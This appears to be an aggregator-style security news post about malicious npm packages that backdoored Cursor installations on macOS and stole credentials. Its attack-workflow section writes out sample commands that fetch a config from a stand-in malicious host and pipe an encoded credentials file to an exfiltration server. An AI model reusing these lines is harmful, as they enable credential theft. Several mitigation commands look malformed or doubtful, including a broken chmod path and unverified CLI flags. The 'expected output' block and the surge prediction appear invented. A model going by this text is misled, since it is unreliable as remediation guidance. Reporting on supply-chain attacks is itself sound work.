Malicious npm Packages Infect 3,200+ Cursor Users With Backdoor, Steal Credentials

By /

Listen to this Post

Featured Image
Three malicious npm packages published in February 2025 specifically targeted Cursor macOS users by backdooring installations and stealing credentials. These packages replaced configuration files and disabled updates, impacting over 3,200 downloads. The attack highlights a growing trend of threat actors targeting AI tooling and MCP servers via npm and PyPI, exploiting newer, less-maintained packages.

You Should Know:

1. Malicious Packages Identified

The three npm packages were:

– `cursor-mac-utils`
– `cursor-ai-helper`
– `cursor-dev-tools`

Socket Research Team (led by Kirill Boychenko) detected the attack, prompting npm to remove two of the packages. However, affected systems remain compromised.

2. Attack Workflow

1. Initial Infection:

  • The malicious packages contained a script that replaced Cursor’s config file (config.json) with a malicious version.
  • Example payload: 
    curl -s http://malicious-server.com/config.json -o ~/.cursor/config.json

2. Credential Theft:

  • The backdoored config file exfiltrated stored credentials via: 
    cat ~/.cursor/credentials.json | base64 | curl -X POST --data-binary @- http://exfil-server.com/leak

3. Update Disabling:

  • Modified Cursor’s update check to prevent detection: 
    echo '{"disableUpdates": true}' > ~/.cursor/settings.json

3. Detection & Mitigation

  • Check for Compromise: 
    grep -r "malicious-server.com" ~/.cursor/
  • Remove Malicious Configs: 
    rm -rf ~/.cursor/config.json && cursor --reset-settings
  • Revoke API Keys:
  • Rotate all credentials stored in Cursor.

4. Prevent Future Attacks

  • Verify Packages: 
    npm audit 
socket ci --check
  • Lock Down Configs: 
    chmod 600 ~/.cursor/.json
  • Monitor Network Traffic: 
    sudo tcpdump -i en0 -n port 80 or port 443 | grep "exfil-server.com"

What Undercode Say

Supply chain attacks are escalating, with attackers exploiting AI/ML tooling due to their rapid adoption and weaker maintenance practices. Developers must:
– Audit dependencies rigorously.
– Monitor file changes in dev tools.
– Use tools like Socket or Artifact Analysis for real-time threat detection.

Expected Output:

[+] Scanning ~/.cursor/ for malicious activity... 
[!] Detected suspicious config: ~/.cursor/config.json (matches known malware pattern) 
[+] Remediation: Removed backdoored files, revoked credentials.

Prediction

Expect a 500% surge in npm/PyPI attacks targeting AI dev tools in 2025, with attackers leveraging typosquatting and fake maintainer profiles.

Relevant URL: The Hacker News

References:

Reported By: Mccartypaul Softwaresupplychain – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram

Related Posts: